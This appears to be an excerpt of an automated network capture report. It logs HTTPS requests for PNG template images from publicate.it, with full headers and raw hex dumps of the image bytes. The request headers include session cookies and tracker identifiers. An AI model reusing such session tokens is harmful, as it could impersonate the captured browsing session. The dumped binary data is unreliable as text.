                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYYmb3zlFVbXSLIaa%2BgvolS4sflBaPd9%2FmiHIwNMCTp6XycCp7kRuCxg%2FBkOG5Eyn1DAHKLbMGE6xATpHUpVSwkVNI6PKlEcigpoZCl9kTE1mldQr7QGL8IX5sOyaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615df7c580cc1-EWR
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC621INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 62 08 03 00 00 00 06 df c0 7b 00 00 03 00 50 4c 54 45 09 09 09 fc fd fd d8 cd a2 fc fc fc fb fb fb 62 62 61 e7 ea eb 00 00 00 04 04 03 0e 0e 0e fd e3 72 fc fc fc f5 dd 75 fc fb f9 e6 e5 e0 fe ff ff f4 f3 f0 f6 f6 f7 f7 f7 f8 fb fc fc f5 f7 f7 fe cd 01 fc fd fd ff cd 05 ff cc 05 ec f0 f2 f8 f7 f7 fc fb fb eb ef f1 f9 f9 f9 ed a0 a8 ec ef f3 f5 f5 f5 f6 f6 f7 25 1c 0a ff ff ff 00 00 00 ec 9f a7 fe cb 03 fe ce 05 23 18 07 1f 14 05 fc cd 01 2a 25 15 fd cc 06 b8 64 af 2b 20 0e b6 61 ac 25 20 11 bb 67 b2 80 5e 49 fb cb 05 34 27 13 7c 59 43 31 21 0c 85 63 4f 54 37 1a 81 66 58 89 68 56 72 50 3b 5f 3f 25 db d7 d1 86 6b 5f 3b 2c 16 6c 48 2d 92 75 69 65 43 2a 8d 71 66 79 55 3c 3f 27 0e 4e 30 14 2d
                                                                                                                                                                                                        Data Ascii: PNGIHDRb{PLTEbbaru%#*%d+ a% g^I4'|YC1!cOT7fXhVrP;_?%k_;,lH-uieC*qfyU<?'N0-
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 75 16 88 90 9e d8 b1 1a ac a6 9f f8 f5 f2 b4 94 21 0e 09 06 6e 3a 17 f6 cf 2a c1 7a 4f c0 9e 1e e4 be 9c e0 a7 93 fc bd 2b 95 95 96 f2 c6 c4 94 6b 43 d8 b5 93 15 10 0e 98 7b 1c f2 e7 c8 d4 bc a5 b9 8e 66 b6 b5 b4 f6 d2 41 b7 80 5a ef c5 a2 a9 77 4e 4b 1f 15 9e 9f a2 95 85 7d f6 d6 d7 aa aa aa a0 7f 62 f5 d6 5a f6 dd 8c 9c 5b 48 c7 ac 95 2e 2d 29 b6 a1 89 7f 3e 2d f7 a8 1a e6 ce e4 b5 40 06 eb f0 f9 ef d3 b7 95 82 38 a8 8b 6f a9 4f 9e cf 9c c9 d1 8a 88 9e 2b 05 c7 74 76 bf 6d 98 b4 63 66 da b1 d5 e3 93 9b de 8c 25 ea a1 34 ea b7 51 fb f2 c9 9c 4b 8a cb ae 48 aa 2f b2 90 00 00 00 15 74 52 4e 53 01 c0 1a d4 fe 0c fd 05 03 0b fe c0 fd c0 42 e9 67 84 96 a9 c7 bf 53 8c af 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78
                                                                                                                                                                                                        Data Ascii: u!n:*zO+kC{fAZwNK}bZ[H.-)>-@8oO+tvmcf%4QKH/tRNSBgSpHYs IDATx
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 26 89 d3 f1 c9 50 af 23 8e bf 18 0a 87 3d f9 72 ce 1c 72 04 f8 a4 39 81 2f 53 a1 eb 75 c4 f9 17 3b 1b 40 ff f5 86 a0 bf 4a a0 3f 4f e2 5d 17 6d 73 84 92 6d 21 be 37 d0 1b c8 ea 8d 05 b2 9c bd 81 be 5e 45 56 56 5f 6f bc 2d a6 eb 8d f5 29 5e c6 17 a2 8b b7 b5 25 b2 1c 6d 8e 80 ae 37 16 d0 39 7b 9d 7d 7d 38 69 2c f0 52 be 7e 5e 97 68 0b 91 c0 e3 0c 3a 67 5f 9f 39 d9 9b 4c e8 14 7d 7d 4e 5d 56 20 d6 c7 bf 2c d4 9d c9 8f 7a 93 6d c9 40 34 19 d3 05 7a 63 e6 a4 82 8f c5 9c cf 7f 36 ce f8 fa 5b 00 fd d5 35 a0 53 66 e6 d5 9f 6f fb e7 2b cf 09 7a 3c 10 6d 4b f6 3a 1c 8e 44 dc 6c 76 c4 48 f4 13 8a b8 d9 6c 6e 8b c5 1c 66 73 9c 7f 49 a0 87 7a cd 6d 8e de 04 4e 1a 4d 9d d4 11 7d 19 5f 3f 8f bf 53 a1 c8 0a 24 71 b6 40 d2 ec 68 4b f6 39 e2 7c c8 6c 4e f6 f6 41 d7 bd 9c
                                                                                                                                                                                                        Data Ascii: &P#=rr9/Su;@J?O]msm!7^EVV_o-)^%m79{}}8i,R~^h:g_9L}}N]V ,zm@4zc6[5Sfo+z<mK:DlvHlnfsIzmNM}_?S$q@hK9|lNA
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 7c a1 ea f3 fa ec af 77 bf fd ca 5b 6f bd f5 ca 2b 5f 6f af f9 eb 5f fe 8f f5 7f 37 37 9b cd 1f 35 57 57 37 36 36 36 56 37 9b 0b dd 7e 5b 4d 55 55 95 fa f3 cf 3f af af af ff bc ea c2 9f ff fc d7 9b 7f bd 79 f3 e6 4d 7f 70 c8 6e b1 38 2c 0e b3 a9 b2 b6 14 eb 3f 1b 1b ab d9 32 db dd 43 43 5f da 1d cd cd cd d5 15 15 66 eb 97 ff 1d 89 44 86 ec cd 15 15 15 15 b5 b5 b5 a5 ed 58 9a 76 8d 46 d3 de de ae 2f d5 eb f5 ed ed 74 88 d2 d2 da da da 5a 3a 50 33 3e 45 69 3b 5e 84 d5 2e bc a2 bd bd 5d 1b 72 2a 14 32 a9 54 ca 49 a4 1c c7 49 25 52 a9 04 4b 8a 25 91 48 38 71 49 24 d2 2c f1 97 df 79 49 25 52 89 ac eb da d7 9b 59 75 af 3b 65 bc 4c 86 0f 40 9f 4b 22 e3 e8 de ba e3 c9 64 32 e7 fd 2b 9b 3a e2 d7 5f 7f 7d ed 1e cf 49 d9 e7 90 a6 8e 2d 91 48 0c cf 06 fd 95 ed d9 d9
                                                                                                                                                                                                        Data Ascii: |w[o+_o_775WW7666V7~[MUU?yMpn8,?2CC_fDXvF/tZ:P3>Ei;^.]r*2TII%RK%H8qI$,yI%RYu;eL@K"d2+:_}I-H
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: d6 c0 9d 3b 5b d7 50 6f b3 93 76 6f 6e 26 d5 6e 2e b4 5b a1 d7 21 ea 16 cb 07 90 f5 2a 75 fd f6 ba 5d 3b 77 9d 65 92 de 1f 1c 72 5b 09 74 13 90 ac a8 a8 b4 fa 3d a4 f4 71 49 99 1d 30 f6 82 4d 17 21 a7 fb 0c 74 92 74 86 39 7b 8a d9 87 4a b8 12 a6 e6 ca 0a fa 75 63 b5 c9 6c 6e ae 00 ea 22 e6 24 e8 1a 8d 2a 7f ce a9 e0 65 72 a9 94 93 66 65 c1 4d 5a 23 eb 12 fa c1 fe a5 a5 f6 19 17 00 7b bb 2c 2b 03 74 41 d2 85 43 90 6c 4a 65 1c 2f e3 5f 17 3d 2f c1 fe 3e 89 12 70 cf b9 7b 8f e7 15 ec 22 4c 29 1d e6 7c d3 a9 80 39 1d 9f 53 dc fe 2c fb 6b ba 90 04 e3 b0 81 a4 ef 80 7b 98 9d 4d 51 01 47 8a 2c fd 19 37 05 fa e7 55 35 35 b6 a0 f5 a8 b9 b9 d9 6c ff 32 e2 71 a9 29 18 8b 98 9b f1 5f 33 64 cd ec 70 58 04 d0 99 a8 5b ac 43 de d6 b2 fa 8e ba 5d bb ce d6 6d af 57 d7 b8
                                                                                                                                                                                                        Data Ascii: ;[Povon&n.[!*u];wer[t=qI0M!tt9{Jucln"$*erfeMZ#{,+tAClJe/_=/>p{"L)|9S,k{MQG,7U55l2q)_3dpX[C]mW
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: c8 cb 90 7d c3 15 2f 11 32 35 d2 94 8e 87 16 64 5f 33 d2 20 42 7e 0e a2 91 0a 96 45 15 80 37 b0 58 08 5a 41 f4 03 c4 04 9f 94 9d 02 7e 9c 54 82 58 9d bf 7d 8d e4 3c 27 9d 46 cb 88 db 53 a0 67 77 20 ae 86 d7 21 e6 d0 64 2c 21 cb d1 91 c4 d4 b1 44 ca c9 c8 4f 58 13 0a ae 93 70 c1 85 cf ce ce b9 76 5b 81 4f 49 4a 63 d3 36 bd e1 f3 2a 18 e7 7a d8 75 af d7 5f 58 29 a6 64 9a 2b ab 9b 60 43 1d 04 35 20 67 2e 38 fd 74 bb 87 22 c1 7e 8f 17 ab df ef a5 2a 0c 40 8f 58 1c 43 7e bf df 7f 93 04 bd ac be 4c ed f2 04 c3 76 f2 e3 ac 76 07 a0 66 fe 3b 03 17 be 39 bc 80 0a 21 2c cf 00 bd d9 d4 4c 17 46 63 63 45 35 04 1c a0 57 94 ea 4b a1 f1 53 a8 97 ea 05 d0 f3 a1 e0 4b a2 06 23 65 bd 18 e8 4c 47 73 a2 ba 4e 6b 69 84 f3 a2 1b ce 71 c8 68 89 aa 41 94 17 a8 49 e6 ac 8b 49 3c
                                                                                                                                                                                                        Data Ascii: }/25d_3 B~E7XZA~TX}<'FSgw !d,!DOXpv[OIJc6*zu_X)d+`C5 g.8t"~*@XC~Lvvf;9!,LFccE5WKSK#eLGsNkiqhAII<
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 1c c8 0f c8 d1 34 08 75 56 dc 4d 65 52 c9 de 33 d4 51 6d 43 71 80 c8 1d 4f e4 04 e9 63 d3 75 c4 44 bd 21 e7 e9 f5 74 e1 0a 10 32 34 0a 62 8c e0 f3 6f 0e f4 21 a0 ce 14 7c 59 55 95 cd ca 24 bd ba 49 4c cc 60 7d 60 07 67 86 64 93 44 7d cd 72 07 fd c1 a0 3f 32 14 b6 5a 23 8c 4e 85 0a ed d9 dd 3b 77 9f 6d a0 74 9d 1f 35 17 16 7c 11 e4 26 87 bf 86 38 37 36 4f 30 6c 35 57 d4 56 54 9b 59 f6 c7 ce 32 7a 64 d9 e1 a7 d5 56 10 e8 40 55 a3 11 04 9d a1 ce e8 53 4c d2 71 43 36 5d 95 3f 18 33 f0 2c 26 cb 4c 9b 67 71 bc 5c ce 01 76 23 fb 52 61 56 41 57 81 9e 26 07 9e 92 31 2c 0f ca f3 0a 61 20 a6 4e 87 01 82 f8 29 35 f2 1c 9f 7a 56 a7 93 70 0a bc d6 68 a4 e7 64 3c 67 bc 77 6d f7 ae dd 58 67 b3 77 b0 3b bb cf a6 65 93 39 e2 8c ef 82 f3 49 64 e9 42 40 1a 72 12 77 4a 01 c8
                                                                                                                                                                                                        Data Ascii: 4uVMeR3QmCqOcuD!t24bo!|YU$IL`}`gdD}r?2Z#N;wmt5|&876O0l5WVTY2zdV@USLqC6]?3,&Lgq\v#RaVAW&1,a N)5zVphd<gwmXgw;e9IdB@rwJ
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 77 2a 9f d4 d4 d4 f4 47 90 75 6f a5 1c 1c d8 cf fd fe 30 2b a3 9b 4c 26 3b 6c 7a 19 59 74 01 f4 5d 0d f5 65 2e 8f db 94 92 73 93 c5 03 fe 65 5d 5d dd 76 b5 2b 68 87 fd b6 40 75 20 a9 13 61 d5 38 06 3a 7b 87 d9 51 29 d8 74 ad fe 50 11 33 e9 ac f2 5a 5d 59 5d 01 05 2f 68 77 92 73 24 6a 8a 43 5d b0 9a 29 b3 2e 95 4b 64 bc 2e a4 84 63 4f a0 df 2e 18 1c 2d 18 d4 e6 87 9c 52 2e cb 39 a7 f9 2f 95 76 30 66 08 69 b4 83 25 da 90 53 70 f1 79 e7 68 41 4c e7 9c d2 f6 c9 79 9e 37 8c 2a a3 5d 83 9a 91 41 65 c2 17 d2 cc 39 c9 ab ef 9a 2a ee c5 16 6a 46 df 88 36 16 d0 4e dd bb b6 6b d7 ee b3 d9 00 fd ed 5d 22 e6 eb 8a 6d d9 d9 39 1d af 3b 91 0c 62 29 e2 4c 49 4f 55 6e 89 46 83 b0 8d 72 3e 29 78 53 d5 d6 3b 95 18 54 00 00 20 00 49 44 41 54 54 62 46 8c 0d 1a 76 e0 4a 22 87
                                                                                                                                                                                                        Data Ascii: w*Guo0+L&;lzYt]e.se]]v+h@u a8:{Q)tP3Z]Y]/hws$jC]).Kd.cO.-R.9/v0fi%SpyhALy7*]Ae9*jF6Nk]"m9;b)LIOUnFr>)xS;T IDATTbFvJ"
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 00 57 ee e1 b3 c8 36 2b e9 35 36 bf d5 1d ec f7 47 be b4 7e 00 7a 24 e9 76 b3 83 ec 34 39 72 ee 49 5b d9 f6 86 8e 86 06 38 65 61 b7 a7 aa 63 f7 ce d4 aa 83 a3 16 66 2f c6 95 62 f5 b8 d4 db eb a0 df 81 f9 ee b3 f0 de fd 16 96 68 83 b0 9b 83 35 88 d8 1a 1a ea ab bc 61 87 c9 41 2d 72 11 57 59 c7 d9 9d bb cf d6 6d 2f ab f1 5b ed 96 7d 07 66 66 96 97 0f 9f 99 98 58 5e 3e d6 32 51 a0 d7 16 cc 1c d2 ae 05 9d 58 17 f0 e5 d6 82 8e 07 c5 73 c8 c4 90 fc c8 29 f4 e5 75 09 25 94 b9 d1 37 9a df 77 5b a3 ef 92 f2 f2 3e cd 88 53 26 e3 0d d1 dc 90 c1 68 98 d2 f7 ca 79 5d af 76 2a 80 b2 97 2c 50 30 d8 95 c5 cb 0c 23 aa 98 8e e7 b3 ba 0a b4 7d 1c d7 35 aa 0a f9 a2 da 78 60 6a d4 c9 21 12 c8 8d 1a 8c bc 31 ab 6b b0 a0 97 de 69 bc 77 b7 a1 e1 ec bf 7f 55 45 74 d6 74 a4 95 f6
                                                                                                                                                                                                        Data Ascii: W6+56G~z$v49rI[8eacf/bh5aA-rWYm/[}ffX^>2QXs)u%7w[>S&hy]v*,P0#}5x`j!1kiwUEtt
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 46 47 12 18 8d 6b 33 73 69 47 4e 4c 30 48 65 8c 39 95 f3 8c a6 65 01 f4 86 1d 98 53 b0 49 ba d4 4d bf 1f 1d 67 85 66 31 46 27 68 a8 a6 2a c0 68 b1 58 c3 11 f8 f7 fd 98 36 61 8f b4 02 74 31 26 43 7e bd cc 15 41 c3 d3 69 46 86 b3 5a 23 36 24 6f 2e 12 15 c7 e6 41 06 06 f1 9f c9 61 0d 0f 85 ad b8 82 6a 5a 5d de 87 93 8f 31 88 64 78 76 7e fe 7a c7 ae 5d 7f dc 55 77 b1 a3 a3 ac 75 fe e1 e3 87 b3 d3 98 56 b2 b8 bc d8 b9 b0 78 e7 fc e2 c2 e2 c4 cc 4c 81 56 5b da 28 f6 bc b2 8e a6 d2 52 ea 5a af 16 45 5d 10 74 2a c2 68 a6 62 a8 aa 49 59 15 03 c0 0b 95 70 5e 76 5b 33 65 40 61 9c 08 f2 72 22 41 18 39 ba 35 82 cc 44 95 2a 8e e7 c1 5e 42 cd 4d 86 d7 82 69 45 ac 46 2a cc 00 64 a2 54 09 07 45 52 00 ef c5 75 40 73 0a 9e 05 11 f1 66 bf be 7b 8f 07 e8 1b 48 ba 18 bd 83 b1
                                                                                                                                                                                                        Data Ascii: FGk3siGNL0He9eSIMgf1F'h*hX6at1&C~AiFZ#6$o.AajZ]1dxv~z]UwuVxLV[(RZE]t*hbIYp^v[3e@ar"A95D*^BMiEF*dTERu@sf{H


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        135192.168.2.549927104.26.8.234443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC807OUTGET /images/template4-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:28 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 54335
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "d43f-620aa1d23442e"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=geq%2B52DgQ9H5UDOPh0FSUYe60Y5qt5PCwxziH9V3uS6%2FQr%2FAjC%2BMnx2PdSksoIs8XgD51axwnnROxckbp2Xd25WQJWvD2RRJ9i3jWMIVy4mOTL2g6cchyUxIaNunoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615df7fa50fa1-EWR
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC620INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 02 62 08 03 00 00 00 06 df c0 7b 00 00 03 00 50 4c 54 45 4c 69 71 61 61 61 ff ff ff 1e 1e 1e 00 00 00 02 02 02 01 01 01 00 00 00 01 01 01 00 00 00 00 00 0e 3a 3c 4a 46 48 55 5a 5a 5a a2 a3 a6 ff ff ff fc fc ff f7 fd 53 fe fd ff ed f1 48 3d 1a 04 ff ff ff f8 f8 f8 c1 c1 c2 3b 3b 3e ff ff ff f3 f3 f3 4b 44 3b cb d0 4f fe fe fe f9 f9 f9 ec ec ed 60 5d 55 d8 d9 d9 cd ce cf 6f 67 4a e7 e8 e8 11 21 34 e8 e8 e8 2c 2d 3d b7 c2 bc c8 c0 b6 93 94 9b de df d8 ac b7 b4 da e6 e8 0f 11 23 0e 10 22 0e 10 23 f6 fd 20 f8 ff 1f ff ff ff 10 12 24 f9 ff 20 f6 ff 20 f5 fd 20 10 12 22 fb ff 20 0a 0c 22 0c 0e 22 0b 0d 1f 0d 0f 20 f8 ff 21 05 08 22 fd ff 20 04 06 19 f6 ff 21 f8 fd 20 07 09 1c f2 f2 f3 fd fd fd f4
                                                                                                                                                                                                        Data Ascii: PNGIHDRb{PLTELiqaaa:<JFHUZZZSH=;;>KD;O`]UogJ!4,-=#"# $ " "" !" !
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 9d a2 25 5e 60 6c 8f 94 25 70 72 7c ab c9 cf 82 5f 44 20 23 35 63 65 70 b9 be 24 e0 e4 21 c9 ce 23 a8 bf c3 52 54 60 96 9b 24 71 79 84 40 42 50 d1 d6 23 3d 3f 4d 9b bb c2 8c 6a 4f fd fd f1 09 09 12 15 30 4f c1 c6 23 9e ac aa 94 74 59 d8 de 23 1c 55 83 c0 ba b4 68 7a 82 45 47 55 9b 7e 64 bb b1 a7 8f a2 a0 4a 2a 16 18 41 68 91 ac af 22 83 c3 ad 9a 87 b6 a8 9b a9 92 7d b1 a1 91 ac d2 eb 1d 35 38 49 9d d5 a8 b8 b7 1f 66 9b a2 86 6e e9 f2 f5 65 ac dc 5c 71 77 79 96 96 89 c0 e4 da ec f1 34 92 d1 a5 8c 75 3a 54 53 28 42 43 21 7c ba 4b 67 66 7c 7d 72 5e 52 46 45 89 ae f9 cd 00 6e 00 00 00 2e 74 52 4e 53 00 0c c0 0f 07 03 0b 02 04 01 fe fc fc 02 1a d4 c0 fb c0 fb fe ea 84 2c fc b5 70 fe fb a4 94 5e fd 46 3a fd 4c ff 3b fa e8 db c5 98 e6 df 77 15 87 81 00 00 00 09
                                                                                                                                                                                                        Data Ascii: %^`l%pr|_D #5cep$!#RT`$qy@BP#=?MjO0O#tY#UhzEGU~dJ*Ah"}58Ifne\qwy4u:TS(BC!|Kgf|}r^RFEn.tRNS,p^F:L;w
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: e1 64 dc 83 3b bf bd e3 5f ed 6f 6c fb 71 9b 4f 96 be 0b 55 97 6f 1b aa 6e 82 8e 09 93 3b 1f dc f9 ad 1d ff 76 f0 d9 0d 0c fa 84 65 e2 2b 89 65 c2 b2 35 64 69 e6 ed b9 7f db f1 2d 0c fa 00 75 00 fd 41 0c fa 4f f7 9e d8 c8 55 d5 af 08 a2 d5 b2 45 64 69 e6 d9 c3 3f c5 a0 3f 78 13 e8 3b 31 e8 df 9f dd b8 a0 4f 58 be 92 aa 5b 2c d6 2d 82 fb d2 cc 87 18 f4 9d eb 40 c7 99 99 6f 7f 6b c7 8f f7 7d ba 71 41 b7 5a ad d6 a9 af 22 d6 2d 82 b9 c5 31 7b 62 ef 8f 77 7c eb db 38 3f 63 80 6e d0 a4 30 e8 0f ec fb de c6 05 dd 62 b1 ee ba f0 55 64 69 ab a0 ee 98 fd fe de 07 06 a0 9b aa 6e fa 71 9b 00 f4 cb 7f fe af 7b 97 6b bb dc 5b 0e 74 ec c9 19 f9 38 c8 c1 6e 0e d0 ff eb 89 7b 97 ff ba b0 e8 d8 72 a0 83 7d 1f 24 61 1f dc b9 f3 db 9b 03 f4 fd f7 2a 4f fc 79 eb 80 3e 63 80
                                                                                                                                                                                                        Data Ascii: d;_olqOUon;ve+e5di-uAOUEdi??x;1OX[,-@ok}qAZ"-1{bw|8?cn0bUdinq{k[t8n{r}$a*Oy>c
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: d0 26 8b 66 13 c8 a6 07 fd de e5 cf 90 7b b7 6c 05 d9 dc a0 ef ba 7c e9 de e5 f2 ae 8d 5d 3b bb 77 d9 c4 a0 5b 2d 5f b5 6b d5 ba 39 ac f7 56 06 1d 6f c1 d6 7b 17 0b 14 58 2c 5b 41 36 35 e8 5f d5 58 5b 2d 5b 43 36 b9 79 ff 6a 62 d9 22 a8 6f 62 d0 b7 e5 cb 64 1b f4 2d 28 db a0 6f 41 d9 06 7d 0b ca 36 e8 5b 50 b6 41 df 82 b2 0d fa 16 94 7b 00 1d 86 a6 4e 40 21 79 6b a4 ab 36 b3 c0 60 4c eb c4 3d 80 be 7e 20 f0 16 49 5f 6c 6e 59 9a bd 33 e8 c7 66 26 26 ad 16 cb 6e 2c 63 af db d6 fa 8d 22 63 48 19 28 ee be 9b a6 ef fd df 99 df 3c f9 b8 63 cf 9e 3d 7b 26 27 26 8d 71 4b eb c0 df 46 ff 3e 95 71 ad 34 10 03 b6 d7 24 46 72 fe d0 ff bc 03 e8 ff f4 a7 1f 30 e7 73 91 77 62 7f f8 d5 ef 9f f9 e5 93 8f 1f da 6d 99 98 98 04 f9 92 a9 4b db 3b ff 37 22 86 d7 75 db 5f 59 ad
                                                                                                                                                                                                        Data Ascii: &f{l|];w[-_k9Vo{X,[A65_X[-[C6yjb"obd-(oA}6[PA{N@!yk6`L=~ I_lnY3f&&n,c"cH(<c={&'&qKF>q4$Fr0swbmK;7"u_Y
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 7f 2b a5 bc 52 ca d5 62 4a 95 21 50 ad 9f cd c7 b3 0d 49 ad a6 2b fd 62 a7 cf a7 d6 f2 2b 0d 2d 5f a4 10 c1 b7 f2 ed 6a 5c 08 e5 ca 3d 86 b3 21 54 f3 79 3c 7e 12 56 de 48 f5 bd d8 0e b8 c0 12 19 96 7f da 17 0e 2c af 5e 64 3f cb bd 3a d0 fe c7 0f 01 fc 58 fb 07 a6 7f 43 5b fe 89 81 09 1f 9d 35 fe 4e 66 ca 0c ef d6 87 8c fc 68 0c 3c b3 e8 27 17 d5 e5 00 67 f8 e1 86 6b 66 2a 33 86 7d e4 90 3b fd 84 0d 85 a5 65 59 aa d9 5c 7e 31 59 ad 96 7d 4c 3b bb 12 ac 28 9d b0 8d a3 c5 55 9a 61 38 89 56 73 42 88 0e f3 b2 ca d4 08 9e a9 c9 42 8f b9 a3 a6 3f b0 ef ff 49 c7 bb a5 44 9f 6f 68 9d 1a 22 a2 15 65 a5 9f 68 4b dd 6c a2 4f 2e d4 08 a1 a2 b4 2b e9 7c 0f 5c 86 6e 76 2d 9b a8 04 8b 95 42 29 df 97 fc 62 a4 cc 53 2a af 06 0c b8 09 62 e0 f3 0f 97 80 b1 6a 0d c3 0f ab d9
                                                                                                                                                                                                        Data Ascii: +RbJ!PI+b+-_j\=!Ty<~VH,^d?:XC[5Nfh<'gkf*3};eY\~1Y}L;(Ua8VsBB?IDoh"ehKlO.+|\nv-B)bS*bj
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 4b 69 79 3e 5a 4a ac e8 49 a5 ad d2 8d 44 bc 91 88 2c a8 6d a5 5a 51 52 32 41 2c b3 21 29 a4 46 25 42 8c 0a 2c 1d 20 42 02 2b 23 2f e2 38 ae 56 33 52 fc a6 e1 1f ed 6b b0 00 bc 08 54 df ef 87 30 85 0b ac 7e 12 cd 99 d9 3e 48 f6 0d 7c 7e ac fd b7 2a e4 d7 24 13 eb 9f 8e d9 f0 49 b3 a0 09 49 b3 77 8c e0 3a 4c d9 fc 70 c2 58 af c1 0d bf 49 a7 61 81 23 af 1f be 11 81 b8 d0 2a 78 bd b6 5c 2b df e4 fd 54 37 a3 25 12 f5 6e b1 9e 89 97 12 1d ce 56 9b 8e 66 b2 c9 5e 94 cb d5 13 f9 42 76 25 9c d4 f2 7c b1 50 28 8a f9 b5 18 9b 4f 2b 8a a6 c5 c3 e4 8a 56 a1 49 84 6c aa 20 07 64 36 da 8b b2 01 42 a5 79 55 14 43 81 30 0e ed 9d 36 ef 3d 57 d9 06 9b 8e 7f 9a 44 36 af 4c d3 b2 54 ec e4 c2 c5 76 3e e7 a1 08 f0 f4 48 d7 74 af 94 e8 a4 b4 ea 32 d3 d0 e2 81 15 25 13 64 1a 5a
                                                                                                                                                                                                        Data Ascii: Kiy>ZJID,mZQR2A,!)F%B, B+#/8V3RkT0~>H|~*$IIw:LpXIa#*x\+T7%nVf^Bv%|P(O+VIl d6ByUC06=WD6LTv>Ht2%dZ
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 46 a5 43 a2 e8 f3 f0 0c 0a c8 51 d6 ef 45 44 24 5b 88 b7 b5 aa d8 4f 64 7a 04 42 e1 64 22 ad c5 7c 4e b5 df ce e4 53 bd b0 90 63 39 4e d2 29 ec da 79 08 9b cd 67 7c b9 a1 f2 9b 35 7e 93 d9 47 82 db 27 43 99 2f f9 87 5f 99 e4 2e 83 8d 60 54 73 76 8f 81 3f a0 9a 61 a2 82 51 cf 7c e6 f7 80 75 e4 83 f3 4c 48 e7 8c 14 22 49 d8 6c 14 c5 51 b5 75 26 1c 5f 09 af d7 b0 8a 14 65 e3 44 41 45 08 c9 2c cb 46 59 2a 20 f0 0c cf 50 21 3e cc 87 48 9d 96 f8 28 2b 72 08 f9 23 05 a5 94 ad 44 f5 e6 5a 35 44 a0 72 21 db 6c 6b 79 71 45 cb e4 a4 20 1b 4a a5 e3 dd 4c 3a 25 d9 9c e1 58 a2 2a 13 5e bd df 8a 84 c5 1e 1b d2 f5 9a d7 03 3b 1b a2 9c c6 9e 8b af c7 f0 64 30 fb c5 b0 31 88 d3 c7 98 ad bf f9 e5 a1 13 77 e9 70 b1 80 b7 f2 f0 c3 0f 3f 3c 39 64 d0 82 59 53 43 81 30 e5 01 57
                                                                                                                                                                                                        Data Ascii: FCQED$[OdzBd"|NSc9N)yg|5~G'C/_.`Tsv?aQ|uLH"IlQu&_eDAE,FY* P!>H(+r#DZ5Dr!lkyqE JL:%X*^;d01wp?<9dYSC0W
